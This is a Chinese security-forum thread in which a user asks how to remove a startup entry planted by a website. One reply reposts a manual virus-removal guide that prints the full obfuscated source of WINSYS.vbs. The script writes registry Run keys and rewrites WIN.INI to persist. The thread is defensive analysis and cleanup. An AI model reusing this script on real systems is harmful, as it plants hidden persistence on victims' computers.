|
 | 作者: lauka [lauka]
 论坛用户 |
登录 |
| 等了一个网站,它改了我的启动项,以至于每次启动都更改注册表 通过优化大师,我看到一句 win32 regedit -s c:\$system$\winsys.cer 我用了瑞星,修正以后,重启还是不行。 |
| 地主 发表时间: 11/24 10:07 |
 | 回复: lida1818 [lida1818]  论坛用户 |
登录 |
|
在优化大师里禁止它,然后删掉winsys.cer |
| B1层 发表时间: 11/24 10:27 |
 | 回复: yxymtr1 [yxymtr1] 论坛用户 |
登录 |
|
去DOS进里删掉它 |
| B2层 发表时间: 11/24 12:20 |
| 回复: lauka [lauka] 论坛用户 |
登录 |
|
关键是优化大师禁不了,启动时候又有。 还有这是一个文件吗?可我根本查不到 我用的式2k,怎么珊,谢谢 |
| B3层 发表时间: 11/24 12:38 |
 | 回复: afan271314 [afan271314]  论坛用户 |
登录 |
|
二楼的 那是个什么文件啊 那个后缀 是什么意思 |
| B4层 发表时间: 11/24 12:43 |
| 回复: lauka [lauka] 论坛用户 |
登录 |
|
顶一下,求助 |
| B5层 发表时间: 11/25 09:06 |
 | 回复: ceo_8008 [ceo_8008]  论坛用户 |
登录 |
|
先去看病毒专区的置顶帖 |
| B6层 发表时间: 11/25 09:49 |
| 回复: lauka [lauka] 论坛用户 |
登录 |
|
请问用优化大师看到的启动项都应该是文件吧,可是这一项根本没有这么一个文件,只是载注册表中,有这种东西? 还有我们所看到的进程是程序吗?有查找文件都能找到吗?不是吧,有的是服务,那些服务项具体是什么东西,文件?如何建立一个服务? 谢谢。 |
| B7层 发表时间: 11/25 12:54 |
| 回复: afan271314 [afan271314] 论坛用户 |
登录 |
|
是不是个隐藏文件啊 你显示所有文件了吗 |
| B8层 发表时间: 11/25 12:57 |
 | 回复: horatio [horatio]  论坛用户 |
登录 |
|
先去看病毒专区的置顶帖 先去看病毒专区的置顶帖 先去看病毒专区的置顶帖 |
| B9层 发表时间: 11/25 13:17 |
| 回复: lauka [lauka] 论坛用户 |
登录 |
|
我早看过杀毒区的置顶贴了,不管用 我早看过杀毒区的置顶贴了,不管用 我早看过杀毒区的置顶贴了,不管用 |
| B10层 发表时间: 11/25 16:12 |
 | 回复: moley [moley]  论坛用户 |
登录 |
|
如果你连这个也看不懂,那就不要怪我了,呵呵! 标题: 病毒手工查杀,个人建议。 返回 作者: 无泪剑客 [moley] 论坛用户 回复 发送 修改 删除 1):任何时候,发现系统出现意外的出错,建议使用工具扫描进程!呵呵,我使用的是“优化大师”的进程管理,不是我偏心呀。 2):发现可疑的进程,建议马上到网上搜索该文件,如果是已经出现过的病毒,那就恭喜你了。如果不是,你应该注意到该进程关闭后,爱机有什么不同哦?如果没有,我们可以试图删除,并查看注册表是否有标志该文件的启动项,有,则删!记住,删除的那个文件,不建议从回收站彻底删除。所有,一切完毕后,重新启动,呵呵,看看是不是还会发生机子问题哦。 3):查看注册表,发现可以注册项目,可以顺着字符串值,到相应的目录删除该文件。当然,如果搜索不到该文件,请使用 DOS,输入dir/s <文件名> attrib <文件名> -h -s -r 这样就可以把该文件的属性改变了,并可以删除了。 4):记得前几天帮助一个朋友查杀这样的一个病毒,很不爽的是,该病毒在win2K注册表项目是:regedit -s C:\$NtUninstallQ887678$\WINSYS.cer,可是使用搜索就是无法找到“WINSYS.cer”这个文件,N火!后来,回到原始的DOS了,输入 D:\winnt>cd.. D:\>dir /s $NtUninstallQ887678$ 家伙,在呀! D:\>attrib $NtUninstallQ887678$ -h -s -r D:\cd $NtUnins~ 嘿嘿,家伙,还藏的很紧哦,TMD,谁做这样的病毒。 D:\$NtUninstallQ887678$>dir 哎,上帝呀,是一个脚本病毒文件WINSYS.vbs,呜,吐,狂吐!!!赶快了,这是人家的病毒呀,赶快来分析! D:\$NtUninstallQ887678$>copy WINSYS.vbs D:\info.txt 呵呵,删咯。 D:\$NtUninstallQ887678$>del *.* "Enter Y" 删你没商量! 好了,这样的代码,还是拿来分享吧! CODE WINSYS.vbs for VBscript <!-- Set sss = CreateObject("WSc" + "ript.Sh" + "ell") mhk="HK"&"LM\SO"&"FTWARE\Mi"&"cr"&"os"&"oft\Win"&"dows\Cu"&"rren"&"tVersion\Run\" mhc="H"&"K"&"CU\So"&"ft"&"ware\Mic"&"ros"&"oft\Win"&"dows\Curren"&"tVersion\Run\" mhk2="HK"&"LM\SO"&"FT"&"WARE\M"&"icr"&"osoft\Wi"&"n"&"dows\Curren"&"tVersion\" sss.RegWrite ""&mhk&"WlN32","regedit -s C:\$NtUninstallQ887678$\WINSYS.cer" <!--他妈的,这段狂写注册表,好象真的太罗嗦和夸张哦! sss.RegWrite ""&mhk&"internat.exe","internat.exe" sss.RegWrite ""&mhk&"zwupdows","12" sss.RegWrite ""&mhk&"win","12" sss.RegWrite ""&mhk&"mwin","12" sss.RegWrite ""&mhk&"internt","12" sss.RegWrite ""&mhk&"Inernet","12" sss.RegWrite ""&mhk&"Internet","12" sss.RegWrite ""&mhk&"iexpleror","12" sss.RegWrite ""&mhk&"zxdows","12" sss.RegWrite ""&mhk&"qwe","12" sss.RegWrite ""&mhk&"win1","12" sss.RegWrite ""&mhk&"intelnat.exe","12" sss.RegWrite ""&mhk&"u1888","12" sss.RegWrite ""&mhk&"intenet","12" sss.RegWrite ""&mhk&"9i5zxdows","12" sss.RegWrite ""&mhk&"9i5com01zxdows","12" sss.RegWrite ""&mhk&"99zxdows","12" sss.RegWrite ""&mhk&"88zxdows","12" sss.RegWrite ""&mhk&"Start Pagewin","12" sss.RegWrite ""&mhk&"Start Page","12" sss.RegWrite ""&mhk&"u188","12" sss.RegWrite ""&mhk&"9i5comzxdows","12" sss.RegWrite ""&mhk&"9q5zxdows","12" sss.RegWrite ""&mhk&"u1881","12" sss.RegWrite ""&mhk&"u1882","12" sss.RegWrite ""&mhk&"u1883","12" sss.RegWrite ""&mhk&"u1884","12" sss.RegWrite ""&mhk&"u1885","12" sss.RegWrite ""&mhk&"u1886","12" sss.RegWrite ""&mhk&"u1887","12" sss.RegWrite ""&mhk&"u88y", "12" sss.RegWrite ""&mhk&"flash", "12" sss.RegWrite ""&mhk&"999izxdows","12" sss.RegWrite ""&mhk&"033zxdows","12" sss.RegWrite ""&mhk&"syste","12" sss.RegWrite ""&mhc&"my","12" sss.RegWrite ""&mhk&"3zxdows","12" sss.RegWrite ""&mhk&"88u88","12" sss.RegWrite ""&mhk&"system","12" sss.RegWrite ""&mhk&"8zxdows","12" sss.RegWrite ""&mhk&"u18","12" sss.RegWrite ""&mhk&"interneet.exe","12" sss.RegWrite ""&mhk2&"RunOnce\", "12" sss.RegWrite ""&mhk&"iexpler", "12" sss.RegWrite ""&mhk&"u1810", "12" sss.RegWrite ""&mhk&"winwin", "12" sss.RegWrite ""&mhk&"WIN32", "12" sss.RegWrite ""&mhk&"W1N32", "12" <!--删除,刚才创建的多余键值! sss.RegDelete ""&mhc&"" sss.RegDelete ""&mhk&"zwupdows" sss.RegDelete ""&mhk&"win" sss.RegDelete ""&mhk&"mwin" sss.RegDelete ""&mhk&"internt" sss.RegDelete ""&mhk&"inernet" sss.RegDelete ""&mhk&"Internet" sss.RegDelete ""&mhk&"u188" sss.RegDelete ""&mhk&"iexpleror" sss.RegDelete ""&mhk&"zxdows" sss.RegDelete ""&mhk&"qwe" sss.RegDelete ""&mhk&"win1" sss.RegDelete ""&mhk&"intelnat.exe" sss.RegDelete ""&mhk&"intenet" sss.RegDelete ""&mhk&"9i5zxdows" sss.RegDelete ""&mhk&"9i5com01zxdows" sss.RegDelete ""&mhk&"99zxdows" sss.RegDelete ""&mhk&"88zxdows" sss.RegDelete ""&mhk&"Start Pagewin" sss.RegDelete ""&mhk&"Start Page" sss.RegDelete ""&mhk&"9i5comzxdows" sss.RegDelete ""&mhk&"9q5zxdows" sss.RegDelete ""&mhk&"999izxdows" sss.RegDelete ""&mhk&"033zxdows" sss.RegDelete ""&mhk&"u1881" sss.RegDelete ""&mhk&"u1882" sss.RegDelete ""&mhk&"u1883" sss.RegDelete ""&mhk&"u1884" sss.RegDelete ""&mhk&"u1885" sss.RegDelete ""&mhk&"u1886" sss.RegDelete ""&mhk&"u1887" sss.RegDelete ""&mhk&"u88y" sss.RegDelete ""&mhk&"flash" sss.RegDelete ""&mhk&"88u88" sss.RegDelete ""&mhk&"interneet.exe" sss.RegDelete ""&mhk&"u18" sss.RegDelete ""&mhk&"u1888" sss.RegDelete ""&mhk&"system" sss.RegDelete ""&mhk&"3zxdows" sss.RegDelete ""&mhk&"8zxdows" sss.RegDelete ""&mhk&"syste" sss.RegDelete ""&mhk2&"RunOnce\" sss.RegDelete ""&mhk&"iexpler" sss.RegDelete ""&mhk&"u1810" sss.RegDelete ""&mhk&"winwin" sss.RegDelete ""&mhk&"WIN32" sss.RegDelete ""&mhk&"W1N32" <!--鸟的,注册表写的还不爽,还想看看WINOWS9X的win.in和system.ini,我也不想看太多,不想看他想干什么,反正太没“数值”了,还好这个人不大了解win2k的了,55555555! Set FSO = CreateObject("Scrip" + "ting." + "FileSyst" + "emO" + "bject") myfile14=FSO.FileExists("c:\wind" + "ows\W" + "IN.INI") if myfile14 then set FSO2=FSO.OpenTextFile("c:\win" + "dows\W" + "IN.INI") mywin=FSO2.ReadALL() l=Instr(mywin,"run=")-3 m=Instr(mywin,"load=")-1 n=Instr(mywin,"NullPort=")-3 FSO2.close if l>0 and m>0 and l>m then set FSO3=FSO.OpenTextFile("c:\wi" + "ndows\W" + "IN.INI") mywin2=FSO3.Read(l) FSO3.close set FSO4=FSO.OpenTextFile("c:\win" + "dows\WI" + "N.INI") mywin3=FSO4.Read(m) FSO4.close if n>0 and n>l then set FSO5=FSO.OpenTextFile("c:\wind" + "ows\WIN" + ".INI") mywin4=FSO5.Read(n) FSO5.close mywin=Replace(mywin,mywin4,"") set FSO2=FSO.CreateTextFile("c:\win" + "dows\WI" + "N.INI") FSO2.Write mywin3 FSO2.WriteLine "load=" FSO2.Write "run=" FSO2.Write mywin FSO2.close else mywin=Replace(mywin,mywin2,"") set FSO2=FSO.CreateTextFile("c:\win" + "dows\WI" + "N.INI") FSO2.Write mywin3 FSO2.Write "load=" FSO2.Write mywin FSO2.close end if end if end if 当然,该程序也有应该佩服的地方,由于使用了"+"号,使的程序的更改性很强哦! 5):好了,本人也很菜,就不多讲了,高手的不要见怪呀。可以的话,我们做个朋友 ,我的QQ:75314404,来自福建的。 [此贴被 无泪剑客(moley) 在 10月20日20时52分 编辑过] ======================================== 如何让你遇见我 为这我已在佛前 求了五百年 求它让我们结一段尘缘 佛于是把我化作一棵树 长在你必经的路旁 阳光下慎重地开满了花 朵朵都是我前世的盼望 ======================================== 20CN是民间非盈利网络安全组织 20CN的建设需要你的参与,按此可为网站更新文档 发表时间: 10/20 20:02 论坛: 病毒专区 返回 |
| B11层 发表时间: 11/25 16:53 |
| 回复: lauka [lauka] 论坛用户 |
登录 |
|
非常感谢无泪兄,我的正式那个vbs代码, 我想问一下问什么windows窗口下,显示隐藏文件缺陷是不出$system$文件夹,dir/s 文件名 是什么意思啊 |
| B12层 发表时间: 11/26 09:36 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 菜鸟乐园 标题: 请教高手,如何更改启动项